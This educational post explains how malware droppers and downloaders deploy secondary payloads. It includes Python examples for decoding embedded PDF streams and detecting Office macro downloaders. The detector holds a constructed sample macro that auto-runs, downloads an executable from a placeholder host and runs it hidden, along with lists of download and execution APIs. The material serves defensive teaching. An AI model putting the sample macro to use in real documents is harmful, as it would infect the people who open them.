
Malware 101: Additional payloads
If you've ever read annual malware reports, you've probably noticed that the Trojan is usually identified as the most common threat. However, as we established earlier in this series, "Trojan" describes an infection method, not the functionality or objectives of the malware. While many Trojans do carry objective-specific functionality, such as deploying bots or stealing information, a Trojan often lives up to its namesake simply by delivering the actual attack in the form of additional payloads.
In the context of malware, a payload is a piece of malware placed on a system by another piece of malware, or possibly by a user in the case of implants. When deployed by a Trojan it is considered a secondary payload, because it is the second piece of malware used in the attack, but additional payloads can be deployed further along the attack chain as well.
How droppers and downloaders work
Aside from implants, where the process is manual, there are two methods by which additional payloads can be deployed automatically by other malware such as Trojans or bots: they can either be embedded in the malware deploying them or downloaded from the internet.
When the payload is embedded in another piece of malware, which typically only happens with Trojans, the deploying malware is generally referred to as a dropper. The dropper converts the embedded payload into its runnable form if necessary and then executes it on the system. Conversion is sometimes necessary because the payload has been encoded to conform to a file format's rules, as with PDFs, where embedded files may be compressed and/or encoded into an ASCII representation. Conversion may also be needed to undo evasion techniques, such as encrypting or obfuscating the embedded payload, that are meant to disguise it from antimalware solutions.
Downloaders, as the name implies, download the additional payload rather than carrying it embedded in the primary payload. A third term, loader, is also common, but its usage is not standardized: for some antimalware vendors it refers to a dropper and for others to a downloader. When the distinction matters, it is often helpful to consult the specific vendor's documentation for how it uses loader, and even dropper. A small number of vendors even refer to embedded files as loaders and downloaded files as droppers, which adds to the confusion.
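The PDF case above is the one a defender meets most directly: the embedded file is stored as a stream, and the carrier's own filters (compression and hex encoding) are exactly the "conversion" the dropper has to reverse before the payload can run. The Python below is an added example, not code from the original post: it builds a constructed, minimal PDF fragment carrying a fake payload as an /EmbeddedFile stream encoded with FlateDecode and then ASCIIHexDecode, then scans the bytes for such streams, applies the filter chain in the order PDF specifies for decoding, and flags results that start with the `MZ` magic of a Windows executable. The sample payload, the object layout and the flat-dictionary limitation of the scanner are all assumptions of this example; a production tool would use a real PDF parser.

```python
import binascii
import re
import zlib

# Constructed sample payload: a fake PE header plus filler, NOT real malware.
FAKE_PAYLOAD = b"MZ" + b"\x00" * 58 + b"constructed-test-payload"


def build_sample_pdf(payload: bytes) -> bytes:
    """Build a minimal, constructed PDF fragment carrying `payload` as an
    /EmbeddedFile stream, compressed (FlateDecode) and then hex-encoded
    (ASCIIHexDecode), the way a dropper's carrier document might store it."""
    encoded = binascii.hexlify(zlib.compress(payload)).upper() + b">"  # '>' is the ASCIIHex EOD marker
    obj = (
        b"<< /Type /EmbeddedFile /Length " + str(len(encoded)).encode()
        + b" /Filter [/ASCIIHexDecode /FlateDecode] >>\nstream\n"
        + encoded + b"\nendstream"
    )
    return b"%PDF-1.7\n1 0 obj\n" + obj + b"\nendobj\n%%EOF\n"


SAMPLE_PDF = build_sample_pdf(FAKE_PAYLOAD)

# Matches "<< dict >> stream ... endstream"; flat dictionaries only (no nested << >>).
STREAM_RE = re.compile(rb"<<([^<>]*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def ascii_hex_decode(data: bytes) -> bytes:
    """PDF ASCIIHexDecode: hex digits, whitespace ignored, '>' ends the data,
    and an odd trailing digit is treated as if followed by '0'."""
    digits = re.sub(rb"\s+", b"", data.split(b">", 1)[0])
    if len(digits) % 2:
        digits += b"0"
    return binascii.unhexlify(digits)


# Decoders keyed by PDF filter name; the dropper has to implement the same steps.
DECODERS = {
    "ASCIIHexDecode": ascii_hex_decode,
    "FlateDecode": zlib.decompress,
}


def parse_filters(dictionary: bytes) -> list:
    """Return filter names in the order they must be applied when decoding
    (a /Filter entry is either a single name or an array of names)."""
    m = re.search(rb"/Filter\s*(\[[^\]]*\]|/\w+)", dictionary)
    if not m:
        return []
    return [name.decode() for name in re.findall(rb"/(\w+)", m.group(1))]


def extract_embedded_files(pdf: bytes) -> list:
    """Scan for /EmbeddedFile streams and decode each through its filter chain.
    Returns one dict per stream with the filters used, the decoded bytes, and
    whether the result starts with the 'MZ' magic of a Windows executable."""
    found = []
    for m in STREAM_RE.finditer(pdf):
        dictionary, raw = m.group(1), m.group(2)
        if not re.search(rb"/Type\s*/EmbeddedFile", dictionary):
            continue
        filters = parse_filters(dictionary)
        data = raw
        for name in filters:
            decoder = DECODERS.get(name)
            if decoder is None:
                # Unknown filter: stop here and report the partially decoded stream.
                break
            data = decoder(data)
        found.append({
            "filters": filters,
            "data": data,
            "looks_like_pe": data[:2] == b"MZ",
        })
    return found


if __name__ == "__main__":
    for entry in extract_embedded_files(SAMPLE_PDF):
        print(entry["filters"], entry["looks_like_pe"], len(entry["data"]), "bytes")
```

The point to notice is that the filter array is applied in listed order when decoding, so the encoder had to run the filters in reverse; an analyst who reads the array as the encoding order will feed hex text to the inflater and get nothing. Checking the decoded bytes for an executable signature is the same "extra analysis step" the text mentions that an embedded file can trigger.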
How droppers and downloaders avoid detection
Embedding payloads versus downloading them involves trade-offs from the perspective of an attacker trying to evade detection. Embedding a payload creates no additional network traffic, so the chance of the payload being detected or blocked by firewalls or other solutions that inspect network traffic for malware is lower. It does, however, increase the size of the initial malware and expose the additional payload to security software sooner for potential analysis. In some contexts, the mere presence of an embedded file can be enough to trigger extra analysis steps in antimalware solutions.
Downloading additional payloads, on the other hand, keeps both the file size and the instructions to be executed more compact. It also lets the attacker take into account any information gathered about the system or network when serving the additional payload, so different payloads can be delivered based on that information. It is not uncommon for legitimate files to download remote content, so this action alone may not be enough to raise suspicion. The payload itself, however, is exposed to any network-based security controls.
In both cases, the logic that executes the payload or loads it into a process is far more difficult to hide unless the file type is expected to exhibit that behavior, such as one masquerading as an installer. Both forms of deployment also have the advantage that, because the additional payload is decoupled from the first, the two can be authored and maintained separately. An attacker can write, or reuse existing, droppers or downloaders independently of the payloads, which can likewise be written by the attacker or taken from existing malware.
Continuing evolution of attacks
With the rise of the malware-as-a-service market, which has become especially popular with ransomware, and of tools for configuring and customizing malware, an attacker needs no knowledge of how to write malware in order to launch a campaign. Malware authors, in turn, do not have to launch campaigns themselves, because they can monetize their work as a product or service instead, allowing more specialization and division of labor across all aspects of malware attacks.
Because the logic required to prepare and execute additional payloads is relatively simple compared to other objectives, a much wider variety of file types can carry it. Scripts, or file types that can contain scripts, can handle this sort of logic, whereas more complex operating system interactions usually require executable files, or at least more capable scripting languages that may not be supported by default on some operating systems.
As a result, Microsoft Office files and PDFs are commonly used as downloaders or droppers, in addition to executable files. This gives the attacker further flexibility in how an attack or campaign is carried out, as well as additional possibilities for evading detection. The simplicity and flexibility that droppers and downloaders afford an attacker have led to their widespread use and created additional challenges that security solutions must adapt to in order to detect these threats.
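Because a downloader in an Office document needs only a few lines of macro code to fetch and run a file, that download-and-execute logic is itself the detection handle the previous paragraphs describe. The Python below is an added example rather than code from the original post: it takes VBA source text (assumed to have already been extracted from the document, which is out of scope here) and looks for the combination of an auto-run entry point, a download API and an execution primitive, while rebuilding strings assembled from literals and `Chr()` calls so that a URL split across concatenations is still recovered. The sample macro, the `cdn.example.test` host and the indicator lists are constructed for the example; the lists are deliberately short and a real scanner would carry many more names.

```python
import re

# Constructed sample macro for illustration; it is not taken from real malware.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim u As String, p As String
    u = "http" & Chr(115) & "://" & "cdn.example" & ".test/upd.exe"
    p = Environ("TEMP") & "\upd.exe"
    URLDownloadToFile 0, u, p, 0, 0
    Shell p, vbHide
End Sub
'''

# One piece of a VBA string expression: a quoted literal or a Chr(n) call.
PIECE = r'(?:"[^"]*"|Chr\(\s*\d+\s*\))'
# A whole expression: pieces joined by the '&' concatenation operator.
STRING_EXPR_RE = re.compile(PIECE + r'(?:\s*&\s*' + PIECE + r')*', re.IGNORECASE)
PIECE_RE = re.compile(PIECE, re.IGNORECASE)

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Indicator names grouped by role (constructed, abbreviated lists).
INDICATORS = {
    "auto_exec": ["AutoOpen", "Auto_Open", "Document_Open", "Workbook_Open"],
    "download": ["URLDownloadToFile", "MSXML2.XMLHTTP", "WinHttp.WinHttpRequest", "ADODB.Stream"],
    "execute": ["Shell", "WScript.Shell", "ShellExecute", "CreateObject"],
}


def recover_strings(vba: str) -> list:
    """Evaluate each string-building expression, turning Chr(n) pieces back into
    characters, so that a URL split across concatenations becomes visible."""
    out = []
    for m in STRING_EXPR_RE.finditer(vba):
        text = ""
        for piece in PIECE_RE.findall(m.group(0)):
            if piece.startswith('"'):
                text += piece[1:-1]
            else:
                text += chr(int(re.search(r"\d+", piece).group(0)))
        out.append(text)
    return out


def find_indicators(vba: str) -> dict:
    """Return, per role, the indicator names present as whole words (case-insensitive)."""
    found = {}
    for category, names in INDICATORS.items():
        found[category] = [
            n for n in names
            if re.search(r"\b" + re.escape(n) + r"\b", vba, re.IGNORECASE)
        ]
    return found


def assess(vba: str) -> dict:
    """Combine recovered URLs with the indicator roles. The 'likely_downloader'
    verdict requires all three roles: something that runs on open, something
    that fetches, and something that executes the result."""
    urls = []
    for s in recover_strings(vba):
        urls.extend(URL_RE.findall(s))
    hits = find_indicators(vba)
    verdict = bool(hits["auto_exec"] and hits["download"] and hits["execute"])
    return {"urls": urls, "indicators": hits, "likely_downloader": verdict}


if __name__ == "__main__":
    result = assess(SAMPLE_VBA)
    print(result["urls"], result["indicators"], result["likely_downloader"])
```

Requiring all three roles is what keeps the check from flagging every document that merely contains `Shell` or an `AutoOpen` handler; on its own, as the text notes, downloading a remote file is something legitimate documents do too. The string reconstruction is the part worth extending: macro authors move the URL out of plain literals precisely because a literal `http://` is the first thing a scanner looks for.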
You can read the rest of the Malware 101 series here.
